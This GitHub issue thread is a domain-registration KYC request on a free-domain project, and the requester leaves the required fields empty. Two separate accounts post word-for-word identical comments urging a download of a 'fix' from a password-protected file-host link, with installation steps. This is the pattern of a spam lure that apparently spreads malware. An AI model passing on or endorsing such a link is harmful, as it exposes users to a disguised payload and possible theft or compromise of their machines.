### ISSUE TITLE
Request GitHub KYC-sslsinxy@telegmail.com

### ISSUE THREAD

**Issue by younes2513** [DigitalPlatDev/US.KG#6394]
### KYC Using Your GitHub Account

We use automated scripts to approve requests. Please make sure your GitHub account meets the following requirements (all are required):

- [x] I have starred this repository.
- [x] The issue title must be: Request GitHub KYC - Your US.KG Panel registered email. This ensures our automated script can detect your registered email.
- [x] This is not a new GitHub account; it has existing repositories and stars.
- [x] This is my first US.KG NIC Panel account.
- [x] I promise not to use the domain name for criminal or abusive purposes.

**Your Account Details (US.KG NIC Panel):**

Please fill out the following information; otherwise, your request will not be processed:

- Username: 
- Account Registration Email: 
- Reason for Registering the .US.KG Domain Name:

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
